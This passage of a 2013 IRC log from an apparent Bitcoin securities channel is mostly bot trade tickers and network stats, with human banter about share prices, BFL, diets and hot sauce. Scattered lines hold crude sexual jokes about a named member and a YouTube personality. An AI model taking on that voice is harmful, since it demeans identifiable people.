[BTCTC] [BFMINES] 15 @ 0.004 = 0.06 BTC [+] Aug 03 22:50:31 [HAVELOCK] [SMG] 1200 @ 0.0002447 = 0.2936 BTC [-] Aug 03 22:51:49 [HAVELOCK] [XBOND] 1 @ 0.00101961 BTC [-] Aug 03 22:54:07 [BTCTC] [BTCGARDEN] 18 @ 0.01724 = 0.3103 BTC [-] Aug 03 22:54:22 meh could only find 18 https://gist.github.com/leffuy/750a4291264fa2de03a5 need a script for this Aug 03 22:56:43 there is more on the smidge.com thread Aug 03 22:57:23 [BTCTC] [BTCGARDEN] 10 @ 0.01701 = 0.1701 BTC [-] Aug 03 22:59:22 www.bcoinnews.com Aug 03 22:59:37 [BTCTC] [DMS.MINING] 20 @ 0.009301 = 0.186 BTC [-] Aug 03 22:59:41 btcgarden email update Aug 03 23:00:47 [HAVELOCK] [LABCO] 25 @ 0.0022 = 0.055 BTC [+] Aug 03 23:00:51 [BTCTC] [DMS.MINING] 13 @ 0.0093 = 0.1209 BTC [-] Aug 03 23:00:53 [BTCTC] [DMS.MINING] 135 @ 0.009201 = 1.2421 BTC [-] Aug 03 23:01:00 [BTCTC] [DMS.MINING] 100 @ 0.0092 = 0.92 BTC [-] Aug 03 23:01:02 [BTCTC] [DMS.MINING] 16 @ 0.00906 = 0.145 BTC [-] Aug 03 23:01:14 [BTCTC] [DMS.MINING] 27 @ 0.00905 = 0.2444 BTC [-] Aug 03 23:01:16 [BTCTC] [DMS.MINING] 50 @ 0.009 = 0.45 BTC [-] Aug 03 23:01:17 [BTCTC] [DMS.MINING] 10 @ 0.008844 = 0.0884 BTC [-] Aug 03 23:01:21 [BTCTC] [DMS.MINING] 10 @ 0.008664 = 0.0866 BTC [-] Aug 03 23:01:22 [BTCTC] [DMS.MINING] 129 @ 0.008663 = 1.1175 BTC [-] Aug 03 23:01:24 [BTCTC] [DMS.MINING] 100 @ 0.0084 = 0.84 BTC [-] Aug 03 23:01:28 [BTCTC] [DMS.MINING] 1000 @ 0.0084 = 8.4 BTC [-] Aug 03 23:01:31 [BTCTC] [DMS.MINING] 1 @ 0.0084 BTC [-] Aug 03 23:02:13 [BTCTC] [ACTIVEMINING] 52 @ 0.005755 = 0.2993 BTC [+] Aug 03 23:02:14 [BTCTC] [BTCGARDEN] 10 @ 0.0171 = 0.171 BTC [+] Aug 03 23:03:01 [BTCTC] [ACTIVEMINING] 32 @ 0.005755 = 0.1842 BTC [+] Aug 03 23:03:03 [MPEX] [S.MPOE] 6447 @ 0.00082708 = 5.3322 BTC [+] Aug 03 23:03:05 [MPEX] [S.MPOE] 1603 @ 0.00082804 = 1.3273 BTC [+] Aug 03 23:03:09 [BTCTC] [DMS.MINING] 1 @ 0.008209 BTC [-] Aug 03 23:03:12 [BTCTC] [DMS.MINING] 10 @ 0.008208 = 0.0821 BTC [-] Aug 03 23:03:13 [BTCTC] [DMS.MINING] 80 @ 0.00817 = 0.6536 BTC [-] Aug 03 23:03:15 [BTCTC] [DMS.MINING] 20 @ 0.00801 = 0.1602 BTC [-] Aug 03 23:03:16 [BTCTC] [DMS.MINING] 10 @ 0.00801 = 0.0801 BTC [-] Aug 03 23:03:17 [BTCTC] [DMS.MINING] 1 @ 0.008 BTC [-] Aug 03 23:03:18 [BTCTC] [DMS.MINING] 1 @ 0.008 BTC [-] Aug 03 23:03:19 [BTCTC] [DMS.MINING] 10 @ 0.007801 = 0.078 BTC [-] Aug 03 23:03:20 [BTCTC] [DMS.MINING] 22 @ 0.0075 = 0.165 BTC [-] Aug 03 23:03:22 [BTCTC] [DMS.MINING] 20 @ 0.007439 = 0.1488 BTC [-] Aug 03 23:03:23 [BTCTC] [DMS.MINING] 20 @ 0.00737 = 0.1474 BTC [-] Aug 03 23:03:23 [BTCTC] [DMS.MINING] 193 @ 0.007369 = 1.4222 BTC [-] Aug 03 23:03:24 [BTCTC] [DMS.MINING] 230 @ 0.007301 = 1.6792 BTC [-] Aug 03 23:03:25 [BTCTC] [DMS.MINING] 80 @ 0.0073 = 0.584 BTC [-] Aug 03 23:03:26 [BTCTC] [DMS.MINING] 10 @ 0.007218 = 0.0722 BTC [-] Aug 03 23:03:27 [BTCTC] [DMS.MINING] 20 @ 0.007218 = 0.1444 BTC [-] Aug 03 23:03:28 [BTCTC] [DMS.MINING] 150 @ 0.007216 = 1.0824 BTC [-] Aug 03 23:05:11 [BTCTC] [BTCGARDEN] 90 @ 0.0171 = 1.539 BTC [+] Aug 03 23:05:13 [BTCTC] [BTCGARDEN] 178 @ 0.01723 = 3.0669 BTC [+] Aug 03 23:05:14 [BTCTC] [BTCGARDEN] 732 @ 0.01724 = 12.6197 BTC [+] Aug 03 23:06:13 [BTCTC] [ACTIVEMINING] 32 @ 0.005754 = 0.1841 BTC [-] Aug 03 23:06:24 when did mircea_popescu get mad at me? x.x Aug 03 23:06:25 [BTCTC] [BTCGARDEN] 285 @ 0.01724 = 4.9134 BTC [+] Aug 03 23:06:52 [BTCTC] [BTCGARDEN] 200 @ 0.01724 = 3.448 BTC [+] Aug 03 23:07:12 [BTCTC] [BTCGARDEN] 670 @ 0.01724 = 11.5508 BTC [+] Aug 03 23:07:42 isn't he mad at everyone? Aug 03 23:08:29 [BTCTC] [BTCGARDEN] 6 @ 0.01723 = 0.1034 BTC [-] Aug 03 23:09:04 [BTCTC] [BTCGARDEN] 95 @ 0.01724 = 1.6378 BTC [+] Aug 03 23:11:04 [BTCTC] [BTCGARDEN] 5 @ 0.01725 = 0.0863 BTC [+] Aug 03 23:11:27 [BTCTC] [TAT.ASICMINER] 25 @ 0.03803 = 0.9508 BTC [+] Aug 03 23:13:42 [BTCTC] [ACTIVEMINING] 53 @ 0.005816 = 0.3082 BTC [+] Aug 03 23:14:45 https://bitcointalk.org/index.php?topic=266828.msg2861155#msg2861155 "besides, that's an Bitcoin Community Forum, not some official-financial-legal site. Is it not possible to say it (a little) shorter, doctor? Aug 03 23:14:46 we're Normal People here and not everybody is a lawyer or such. sometimes we can understand with less wording. IMHO. Aug 03 23:14:46 will do reading further when time permits." Aug 03 23:14:51 [BTC-TC] BTC Growth: Capital Growth via Hedge Fund-Style Investing Aug 03 23:15:14 https://www.youtube.com/watch?v=Mc06khDks1w Aug 03 23:15:16 GloZell's Cereal Challenge GloZell - YouTube Aug 03 23:15:20 Was that english? Aug 03 23:15:22 I found what mp faps to Aug 03 23:15:55 [BTCTC] [ACTIVEMINING] 18 @ 0.00578 = 0.104 BTC [-] Aug 03 23:18:05 Diablo-D3: typical american Aug 03 23:18:42 eating fattening unhealthy carbohydrates Aug 03 23:18:47 [BTCTC] [ACTIVEMINING] 7 @ 0.005816 = 0.0407 BTC [+] Aug 03 23:20:35 pankkake: I agree Aug 03 23:20:40 she is a canidate for the paleo diet Aug 03 23:20:45 mp shall give her his meat. Aug 03 23:21:13 Both of you do paleo? Aug 03 23:22:29 [BTCTC] [LABCOIN] 83 @ 0.001898 = 0.1575 BTC [-] Aug 03 23:23:15 [BTCTC] [LABCOIN] 14 @ 0.001899 = 0.0266 BTC [+] Aug 03 23:23:16 [BTCTC] [LABCOIN] 208 @ 0.001899 = 0.395 BTC [+] Aug 03 23:23:31 for women I recommend the cum diet http://www.dontspitswallow.com/cum_nutrition.shtml Aug 03 23:24:26 [HAVELOCK] [LABCO] 95 @ 0.0022 = 0.209 BTC [+] Aug 03 23:24:51 [BTCTC] [ACTIVEMINING] 53 @ 0.005816 = 0.3082 BTC [+] Aug 03 23:24:51 [BTCTC] [ACTIVEMINING] 169 @ 0.005817 = 0.9831 BTC [+] Aug 03 23:25:16 Rulother-pc_: I do, pankkake sorta does because hes not american and people in his country eat much better by default Aug 03 23:26:11 "nd the average ejaculation produces about a tablespoon of semen," Aug 03 23:26:13 [BTCTC] [COGNITIVE] 7 @ 0.4829 = 3.3803 BTC [-] Aug 03 23:26:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.03945 = 0.9863 BTC [+] Aug 03 23:26:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.03947 BTC [+] Aug 03 23:26:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.03947 = 0.0789 BTC [+] Aug 03 23:26:21 [BTCTC] [ACTIVEMINING] 45 @ 0.005817 = 0.2618 BTC [+] Aug 03 23:26:25 seriously? Aug 03 23:26:53 I must have an above average dick Aug 03 23:27:15 nuts, big nuts Aug 03 23:27:20 French yougnsters don't eat that well Aug 03 23:27:39 pankkake: well like Aug 03 23:27:46 even the french diet of bread Aug 03 23:27:48 and I'm doing paleo Aug 03 23:27:52 its freshly baked bread Aug 03 23:27:56 done the old school way Aug 03 23:28:25 which is a shitload better than the hfcs + who knows what bullshit they pass off for bread in the US Aug 03 23:28:35 well at least it's tastier Aug 03 23:28:54 you are doing paleo? I thought you wernt Aug 03 23:30:49 [BTCTC] [BTCGARDEN] 350 @ 0.0172 = 6.02 BTC [-] Aug 03 23:31:08 pankkake: btw, my hot sauce came out well Aug 03 23:31:15 I was going for flavorful and not pure heat Aug 03 23:31:21 I got flavorful and ... well Aug 03 23:31:22 its not mild Aug 03 23:31:33 since about a year I'm doing it seriously Aug 03 23:31:36 its hot, Ive tasted hotter, but its not ZOMG MY MOUTH IS ON FIRE Aug 03 23:31:47 ahh, Ive been doing it seriously since jan Aug 03 23:32:03 I weighed myself this morning, 246. Aug 03 23:32:11 6 more pounds and I will have lost 100 pounds Aug 03 23:33:04 nice Diablo-D3 :) Aug 03 23:33:09 ;;nethash Aug 03 23:33:09 307146.286753 Aug 03 23:33:21 340 to 240 Aug 03 23:33:29 and I should weigh about 180 Aug 03 23:33:49 [HAVELOCK] [AM100] 160 @ 0.035 = 5.6 BTC [+] Aug 03 23:35:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.03935 = 0.0787 BTC [-] Aug 03 23:37:17 [HAVELOCK] [HIM] 3 @ 0.142 = 0.426 BTC [+] Aug 03 23:37:20 [HAVELOCK] [HIM] 5 @ 0.14138 = 0.7069 BTC [-] Aug 03 23:38:00 BFL: "Some say we have shipped very few products: If you complain that we ship little and that the difficulty is rising rapidly, you just don't understand how this whole BTC thing works.." Aug 03 23:38:53 herp. Aug 03 23:38:53 wow, they really think their customers are idiots Aug 03 23:39:04 even MP has better PR! Aug 03 23:40:26 yeah really Aug 03 23:40:31 and he just has sex with all the female customers Aug 03 23:43:52 ;;bc,stats Aug 03 23:43:54 Current Blocks: 250038 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1961 blocks | Next Difficulty In About: 1 week, 4 days, 12 hours, 50 minutes, and 49 seconds | Next Difficulty Estimate: 35786702.4813 | Estimated Percent Change: -4.29512 Aug 03 23:44:00 ;;ticker Aug 03 23:44:01 MtGox BTCUSD ticker | Best bid: 105.01000, Best ask: 105.01002, Bid-ask spread: 0.00002, Last trade: 105.01002, 24 hour volume: 8673.24948069, 24 hour low: 102.00000, 24 hour high: 105.88520, 24 hour vwap: 103.81604 Aug 03 23:46:13 ;;estimate Aug 03 23:46:14 Next difficulty estimate | 35273226.3919 based on data since last change | 42487549.4768 based on data for last three days Aug 03 23:47:05 this is gonna be a juicy one Aug 03 23:47:10 i cna feel it Aug 03 23:47:24 [BTCTC] [BTCGARDEN] 550 @ 0.0172 = 9.46 BTC [-] Aug 03 23:47:26 maybe 25%-30% diff increase Aug 03 23:48:35 https://www.evernote.com/shard/s248/sh/644abd83-47e4-418a-b06c-ee1cc0ef0cfa/ded1a740a6ffc287ecbac046ef74b024 Aug 03 23:48:37 Hot Sauce Aug 03 23:48:40 I dont think I showed this in here Aug 03 23:48:42 my hot sauce recipe Aug 03 23:53:13 [BTCTC] [TAT.ASICMINER] 25 @ 0.03922 = 0.9805 BTC [-] Aug 03 23:53:14 [BTCTC] [TAT.ASICMINER] 18 @ 0.03923 = 0.7061 BTC [+] Aug 03 23:53:16 [BTCTC] [TAT.ASICMINER] 39 @ 0.03925 = 1.5308 BTC [+] Aug 03 23:54:15 [BTCTC] [BTCGARDEN] 24 @ 0.0172 = 0.4128 BTC [-] Aug 03 23:55:33 [BTCTC] [BTCGARDEN] 2 @ 0.0172 = 0.0344 BTC [-] Aug 03 23:57:24 [HAVELOCK] [HIM] 1 @ 0.142 BTC [+] Aug 03 23:58:33 [HAVELOCK] [LABCO] 220 @ 0.0022 = 0.484 BTC [+] Aug 04 00:00:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.03918 = 0.3918 BTC [-] Aug 04 00:03:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002978 BTC [+] Aug 04 00:06:39 [BTCTC] [BTC-BOND] 10 @ 0.00998 = 0.0998 BTC [-] Aug 04 00:08:09 [HAVELOCK] [XBOND] 3 @ 0.00104599 = 0.0031 BTC [+] Aug 04 00:08:37 [BTCTC] [BTCGARDEN] 1 @ 0.0171 BTC [-] Aug 04 00:09:06 [BTCTC] [TAT.ASICMINER] 25 @ 0.03913 = 0.9783 BTC [-] Aug 04 00:11:25 [BTCTC] [DMS.SELLING] 5 @ 0.0244 = 0.122 BTC [-] Aug 04 00:12:02 [BTCTC] [DMS.SELLING] 102 @ 0.0243 = 2.4786 BTC [-] Aug 04 00:13:17 [BTCTC] [BTCGARDEN] 7 @ 0.017 = 0.119 BTC [-] Aug 04 00:13:19 [BTCTC] [BTCGARDEN] 6 @ 0.017 = 0.102 BTC [-] Aug 04 00:13:19 [BTCTC] [BTCGARDEN] 19 @ 0.017 = 0.323 BTC [-] Aug 04 00:13:35 [BTCTC] [ACTIVEMINING] 50 @ 0.00585 = 0.2925 BTC [+] Aug 04 00:13:37 [BTCTC] [ACTIVEMINING] 50 @ 0.005775 = 0.2888 BTC [-] Aug 04 00:13:38 [BTCTC] [ACTIVEMINING] 11 @ 0.005755 = 0.0633 BTC [-] Aug 04 00:13:39 [BTCTC] [ACTIVEMINING] 100 @ 0.005755 = 0.5755 BTC [-] Aug 04 00:13:41 [BTCTC] [ACTIVEMINING] 120 @ 0.005754 = 0.6905 BTC [-] Aug 04 00:13:42 [BTCTC] [ACTIVEMINING] 2 @ 0.00571 = 0.0114 BTC [-] Aug 04 00:13:43 [BTCTC] [ACTIVEMINING] 284 @ 0.005607 = 1.5924 BTC [-] Aug 04 00:14:01 [BTCTC] [LABCOIN] 3 @ 0.001897 = 0.0057 BTC [-] Aug 04 00:14:25 [BTCTC] [MININGCO.ETF] 2 @ 1.735 = 3.47 BTC [+] Aug 04 00:14:43 [BTCTC] [BTCGARDEN] 88 @ 0.017 = 1.496 BTC [-] Aug 04 00:14:43 [BTCTC] [BTCGARDEN] 300 @ 0.01719 = 5.157 BTC [+] Aug 04 00:14:44 [BTCTC] [BTCGARDEN] 1 @ 0.01719 BTC [+] Aug 04 00:14:46 [BTCTC] [BTCGARDEN] 74 @ 0.0172 = 1.2728 BTC [+] Aug 04 00:14:47 [BTCTC] [BTCGARDEN] 5 @ 0.0172 = 0.086 BTC [+] Aug 04 00:18:16 [BTCTC] [BTCGARDEN] 18 @ 0.01723 = 0.3101 BTC [+] Aug 04 00:18:18 [BTCTC] [BTCGARDEN] 282 @ 0.01724 = 4.8617 BTC [+] Aug 04 00:20:12 [HAVELOCK] [XBOND] 2232 @ 0.00104598 = 2.3346 BTC [-] Aug 04 00:20:57 [HAVELOCK] [XBOND] 2938 @ 0.00104598 = 3.0731 BTC [-] Aug 04 00:21:15 [BTCTC] [COGNITIVE] 9 @ 0.482 = 4.338 BTC [-] Aug 04 00:21:41 [BTCTC] [BTCGARDEN] 18 @ 0.01724 = 0.3103 BTC [+] Aug 04 00:22:40 [BTCTC] [BTCGARDEN] 14 @ 0.01725 = 0.2415 BTC [+] Aug 04 00:23:07 [BTCTC] [BTCGARDEN] 18 @ 0.01724 = 0.3103 BTC [-] Aug 04 00:23:08 [BTCTC] [BTCGARDEN] 196 @ 0.01725 = 3.381 BTC [+] Aug 04 00:23:19 [HAVELOCK] [XBOND] 1 @ 0.00103 BTC [-] Aug 04 00:28:47 [BTCTC] [ACTIVEMINING] 1 @ 0.00589 BTC [+] Aug 04 00:29:14 [BTCTC] [ACTIVEMINING] 3 @ 0.00564 = 0.0169 BTC [-] Aug 04 00:29:38 [BTCTC] [B.YABMC] 1 @ 0.002854 BTC [+] Aug 04 00:29:40 [BTCTC] [B.YABMC] 8 @ 0.002855 = 0.0228 BTC [+] Aug 04 00:31:24 [BTCTC] [LABCOIN] 30 @ 0.001869 = 0.0561 BTC [-] Aug 04 00:32:06 [BTCTC] [LABCOIN] 31 @ 0.001868 = 0.0579 BTC [-] Aug 04 00:34:14 [HAVELOCK] [SMG] 1 @ 0.0002446 BTC [-] Aug 04 00:35:00 [HAVELOCK] [HIM] 5 @ 0.1359 = 0.6795 BTC [-] Aug 04 00:35:15 [HAVELOCK] [HIM] 9 @ 0.1353 = 1.2177 BTC [-] Aug 04 00:39:48 [HAVELOCK] [AM1] 1 @ 3.98 BTC [+] Aug 04 00:40:39 [HAVELOCK] [LABCO] 1556 @ 0.0022 = 3.4232 BTC [+] Aug 04 00:41:09 [HAVELOCK] [LABCO] 33 @ 0.0022 = 0.0726 BTC [+] Aug 04 00:42:25 [HAVELOCK] [XBOND] 69 @ 0.00104599 = 0.0722 BTC [+] Aug 04 00:43:35 [BTCTC] [BTCGARDEN] 1 @ 0.0172 BTC [-] Aug 04 00:43:57 [BTCTC] [LABCOIN] 1 @ 0.001897 BTC [+] Aug 04 00:46:03 [HAVELOCK] [XBOND] 250 @ 0.0010455 = 0.2614 BTC [-] Aug 04 00:46:40 [BTCTC] [KENILWORTH] 1 @ 0.001592 BTC [-] Aug 04 00:47:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002978 BTC [+] Aug 04 00:48:39 [HAVELOCK] [AM100] 1 @ 0.0378989 BTC [+] Aug 04 00:48:42 [HAVELOCK] [AM100] 1 @ 0.0379 BTC [+] Aug 04 00:48:44 [BTCTC] [LABCOIN] 1 @ 0.00187 BTC [-] Aug 04 00:48:45 [HAVELOCK] [AM100] 18 @ 0.038 = 0.684 BTC [+] Aug 04 00:50:09 [BTCTC] [LABCOIN] 29 @ 0.001869 = 0.0542 BTC [-] Aug 04 00:50:09 [BTCTC] [LABCOIN] 26 @ 0.001868 = 0.0486 BTC [-] Aug 04 00:50:43 [HAVELOCK] [XBOND] 428 @ 0.00104599 = 0.4477 BTC [+] Aug 04 00:50:45 [HAVELOCK] [XBOND] 122 @ 0.001046 = 0.1276 BTC [+] Aug 04 00:51:06 [BTCTC] [LABCOIN] 445 @ 0.001868 = 0.8313 BTC [-] Aug 04 00:54:51 [BTCTC] [BTCGARDEN] 14 @ 0.0172 = 0.2408 BTC [-] Aug 04 00:54:52 [BTCTC] [BTCGARDEN] 41 @ 0.01724 = 0.7068 BTC [+] **** BEGIN LOGGING AT Sun Aug 4 06:41:54 2013 Aug 04 06:42:13 mjr_ hey you around ? Aug 04 06:42:29 [BTCTC] [DMS.SELLING] 1 @ 0.0255 BTC [+] Aug 04 06:43:44 "State Seizes Two-Year-Old Child From Parents Because They Smoked Pot, Child Dies in Foster Care" Aug 04 06:44:45 [BTCTC] [DMS.MINING] 1 @ 0.008396 BTC [+] Aug 04 06:44:54 [MPEX] [S.MPOE] 3700 @ 0.00082639 = 3.0576 BTC [-] Aug 04 06:47:12 why is S.BBET going down? Aug 04 06:47:24 to go with http://www.dailymail.co.uk/news/article-2383672/They-killed-Bambi-15-armed-agents-storm-animal-shelter-euthanize-baby-deer-called-Giggles-local-law-forbids-keeping-wildlife.html Aug 04 06:47:31 !t m s.bbet Aug 04 06:47:32 [BTCTC] [LABCOIN] 50 @ 0.00188 = 0.094 BTC [-] Aug 04 06:47:33 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00099999 / 0.00099999 / 0.00099999 (1200 shares, 1.20 BTC), 30D: 0.0005505 / 0.0006199 / 0.00102899 (24599 shares, 15.25 BTC) Aug 04 06:47:51 Guest16230 seems it's up 50% this month, what are you talkin' aboot Aug 04 06:48:18 oh i must be deranged, my value analysis says i lost tons of money on it and i only bought it yesterday Aug 04 06:48:22 does it not update frequently Aug 04 06:49:04 delayed up to 3 minutes my ass Aug 04 06:49:11 i have no idea how you could have lost tons of money on it since it's trading at top atm. what did you pay ? Aug 04 06:49:58 my value analysis tab in btct still says the current bid is .0018 when its .003 Aug 04 06:50:06 [BTCTC] [BTCGARDEN] 55 @ 0.01662 = 0.9141 BTC [+] Aug 04 06:50:07 [BTCTC] [BTCGARDEN] 1 @ 0.01662 BTC [+] Aug 04 06:50:09 [BTCTC] [BTCGARDEN] 397 @ 0.01661 = 6.5942 BTC [-] Aug 04 06:50:10 [BTCTC] [BTCGARDEN] 50 @ 0.01661 = 0.8305 BTC [-] Aug 04 06:50:11 [BTCTC] [BTCGARDEN] 216 @ 0.0166 = 3.5856 BTC [-] Aug 04 06:50:17 .003 ?! wtf ? Aug 04 06:50:17 [BTCTC] [BTCGARDEN] 5 @ 0.0166 = 0.083 BTC [-] Aug 04 06:50:18 [BTCTC] [BTCGARDEN] 432 @ 0.01657 = 7.1582 BTC [-] Aug 04 06:50:19 [BTCTC] [BTCGARDEN] 7 @ 0.01655 = 0.1159 BTC [-] Aug 04 06:50:21 [BTCTC] [BTCGARDEN] 300 @ 0.01655 = 4.965 BTC [-] Aug 04 06:50:23 [BTCTC] [BTCGARDEN] 20 @ 0.0165 = 0.33 BTC [-] Aug 04 06:50:23 [BTCTC] [BTCGARDEN] 18 @ 0.0165 = 0.297 BTC [-] Aug 04 06:50:24 [BTCTC] [BTCGARDEN] 300 @ 0.0163 = 4.89 BTC [-] Aug 04 06:50:25 [BTCTC] [BTCGARDEN] 3 @ 0.0163 = 0.0489 BTC [-] Aug 04 06:50:26 [BTCTC] [BTCGARDEN] 100 @ 0.01626 = 1.626 BTC [-] Aug 04 06:50:28 [BTCTC] [BTCGARDEN] 111 @ 0.01625 = 1.8038 BTC [-] Aug 04 06:50:29 [BTCTC] [BTCGARDEN] 50 @ 0.01622 = 0.811 BTC [-] Aug 04 06:50:30 [BTCTC] [BTCGARDEN] 100 @ 0.01621 = 1.621 BTC [-] Aug 04 06:50:31 [BTCTC] [BTCGARDEN] 800 @ 0.0162 = 12.96 BTC [-] Aug 04 06:50:32 [BTCTC] [BTCGARDEN] 200 @ 0.01613 = 3.226 BTC [-] Aug 04 06:50:32 [BTCTC] [BTCGARDEN] 600 @ 0.01612 = 9.672 BTC [-] Aug 04 06:50:33 [BTCTC] [BTCGARDEN] 200 @ 0.01612 = 3.224 BTC [-] Aug 04 06:50:34 [BTCTC] [BTCGARDEN] 50 @ 0.01611 = 0.8055 BTC [-] Aug 04 06:50:35 [BTCTC] [BTCGARDEN] 432 @ 0.0161 = 6.9552 BTC [-] Aug 04 06:50:40 oh thats the ask Aug 04 06:51:22 i guess the system is screwy cuz theres a huge spread on the bid/ask Aug 04 06:53:16 [MPEX] [S.MPOE] 3864 @ 0.00082899 = 3.2032 BTC [+] Aug 04 06:57:15 [BTCTC] [LABCOIN] 3 @ 0.001918 = 0.0058 BTC [+] Aug 04 06:57:46 damn, garden was such a dud, made out with almost 1 btc profit Aug 04 07:03:00 [BTCTC] [ACTIVEMINING] 10 @ 0.006053 = 0.0605 BTC [+] Aug 04 07:07:39 lolk Aug 04 07:08:10 btc garden going to have a hard time issuing the next 2 million shares over .016 Aug 04 07:11:45 [BTCTC] [BTCGARDEN] 83 @ 0.01697 = 1.4085 BTC [+] Aug 04 07:11:46 [BTCTC] [BTCGARDEN] 1 @ 0.01697 BTC [+] Aug 04 07:11:48 [BTCTC] [BTCGARDEN] 666 @ 0.01698 = 11.3087 BTC [+] **** BEGIN LOGGING AT Sun Aug 4 07:22:24 2013 Aug 04 07:22:24 [BTCTC] [LABCOIN] 500 @ 0.001921 = 0.9605 BTC [+] Aug 04 07:22:27 http://trilema.com/2013/smg-july-2013-statement/ Aug 04 07:22:30 S.MG, July 2013 Statement pe Trilema - Un blog de Mircea Popescu. Aug 04 07:22:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.03926 = 0.0785 BTC [-] Aug 04 07:23:21 [BTCTC] [LABCOIN] 25 @ 0.001922 = 0.0481 BTC [+] Aug 04 07:24:21 [BTCTC] [LABCOIN] 300 @ 0.001923 = 0.5769 BTC [+] Aug 04 07:25:03 [BTCTC] [LABCOIN] 26 @ 0.001924 = 0.05 BTC [+] Aug 04 07:26:03 [BTCTC] [BTCGARDEN] 8 @ 0.01697 = 0.1358 BTC [-] Aug 04 07:28:11 [BTCTC] [ACTIVEMINING] 166 @ 0.006053 = 1.0048 BTC [+] Aug 04 07:29:01 [BTCTC] [LABCOIN] 400 @ 0.001924 = 0.7696 BTC [+] Aug 04 07:29:18 ;;ticker Aug 04 07:29:18 MtGox BTCUSD ticker | Best bid: 105.00003, Best ask: 105.19873, Bid-ask spread: 0.19870, Last trade: 105.19873, 24 hour volume: 8096.98383083, 24 hour low: 102.00000, 24 hour high: 105.88520, 24 hour vwap: 103.84199 Aug 04 07:29:49 [BTCTC] [BTCGARDEN] 26 @ 0.01697 = 0.4412 BTC [-] Aug 04 07:33:33 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [+] Aug 04 07:34:14 ;;later tell thestringpuller hey whats up. saw you were lookin for me. have been afk for a few days - been moving. drop me a pm if you need. Aug 04 07:34:15 The operation succeeded. Aug 04 07:34:28 [BTCTC] [LABCOIN] 574 @ 0.001924 = 1.1044 BTC [+] Aug 04 07:34:51 [BTCTC] [LABCOIN] 1500 @ 0.001924 = 2.886 BTC [+] Aug 04 07:35:32 lol Aug 04 07:39:34 [BTCTC] [BTCGARDEN] 70 @ 0.01697 = 1.1879 BTC [-] Aug 04 07:43:49 [BTCTC] [BTCGARDEN] 25 @ 0.01697 = 0.4243 BTC [-] Aug 04 07:45:53 [BTCTC] [BTCGARDEN] 210 @ 0.01697 = 3.5637 BTC [-] Aug 04 07:46:46 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 04 07:46:54 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 04 07:47:58 [BTCTC] [BTCGARDEN] 2 @ 0.01615 = 0.0323 BTC [-] Aug 04 07:48:00 [BTCTC] [BTCGARDEN] 1 @ 0.01615 BTC [-] Aug 04 07:48:01 [BTCTC] [BTCGARDEN] 36 @ 0.01615 = 0.5814 BTC [-] Aug 04 07:48:02 [BTCTC] [BTCGARDEN] 73 @ 0.01615 = 1.179 BTC [-] Aug 04 07:48:04 [BTCTC] [BTCGARDEN] 26 @ 0.01615 = 0.4199 BTC [-] Aug 04 07:48:05 [BTCTC] [BTCGARDEN] 90 @ 0.01614 = 1.4526 BTC [-] Aug 04 07:48:06 [BTCTC] [BTCGARDEN] 200 @ 0.01614 = 3.228 BTC [-] Aug 04 07:48:07 [BTCTC] [BTCGARDEN] 112 @ 0.01613 = 1.8066 BTC [-] Aug 04 07:50:42 [BTCTC] [LABCOIN] 526 @ 0.001924 = 1.012 BTC [+] Aug 04 07:50:44 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [+] Aug 04 07:50:46 [BTCTC] [ASICMINER-PT] 7 @ 4.067 = 28.469 BTC [+] Aug 04 07:52:35 [BTCTC] [BTCGARDEN] 65 @ 0.01695 = 1.1018 BTC [+] Aug 04 07:53:21 [BTCTC] [BTCGARDEN] 2 @ 0.01695 = 0.0339 BTC [+] **** BEGIN LOGGING AT Sun Aug 4 07:56:29 2013 Aug 04 07:56:44 so i'm talking to an old friend, haven't spoken in years. he's an accountant. Aug 04 07:57:00 he asks what am i doing, i say i'm having a triple cognac and doing my books. Aug 04 07:57:03 *pause* Aug 04 07:57:42 [BTCTC] [LABCOIN] 2 @ 0.001858 = 0.0037 BTC [-] Aug 04 07:58:43 [MPEX] [S.MPOE] 4936 @ 0.00082899 = 4.0919 BTC [+] Aug 04 08:02:17 [BTCTC] [LABCOIN] 1198 @ 0.001858 = 2.2259 BTC [-] Aug 04 08:02:19 [BTCTC] [LABCOIN] 142 @ 0.001848 = 0.2624 BTC [-] Aug 04 08:04:47 [BTCTC] [ACTIVEMINING] 375 @ 0.006053 = 2.2699 BTC [+] Aug 04 08:06:40 [BTCTC] [ACTIVEMINING] 550 @ 0.006053 = 3.3292 BTC [+] **** BEGIN LOGGING AT Sun Aug 4 08:55:04 2013 Aug 04 08:56:27 [BTCTC] [LABCOIN] 112 @ 0.00185 = 0.2072 BTC [+] Aug 04 08:56:28 [BTCTC] [LABCOIN] 199 @ 0.001849 = 0.368 BTC [-] Aug 04 08:56:30 [BTCTC] [LABCOIN] 658 @ 0.001848 = 1.216 BTC [-] Aug 04 08:56:31 [BTCTC] [LABCOIN] 5 @ 0.001848 = 0.0092 BTC [-] Aug 04 08:56:31 [BTCTC] [LABCOIN] 147 @ 0.001847 = 0.2715 BTC [-] Aug 04 08:56:32 [BTCTC] [LABCOIN] 27 @ 0.001847 = 0.0499 BTC [-] Aug 04 08:56:33 [BTCTC] [LABCOIN] 102 @ 0.001847 = 0.1884 BTC [-] Aug 04 08:58:11 [MPEX] [S.MPOE] 7115 @ 0.00082877 = 5.8967 BTC [-] Aug 04 08:58:12 [MPEX] [S.MPOE] 1085 @ 0.00083132 = 0.902 BTC [+] Aug 04 08:58:22 [BTCTC] [LABCOIN] 259 @ 0.001847 = 0.4784 BTC [-] Aug 04 08:58:24 [BTCTC] [LABCOIN] 73 @ 0.001828 = 0.1334 BTC [-] Aug 04 08:58:25 [BTCTC] [LABCOIN] 439 @ 0.001827 = 0.8021 BTC [-] Aug 04 08:58:26 [BTCTC] [LABCOIN] 416 @ 0.001825 = 0.7592 BTC [-] Aug 04 08:58:28 [BTCTC] [LABCOIN] 2500 @ 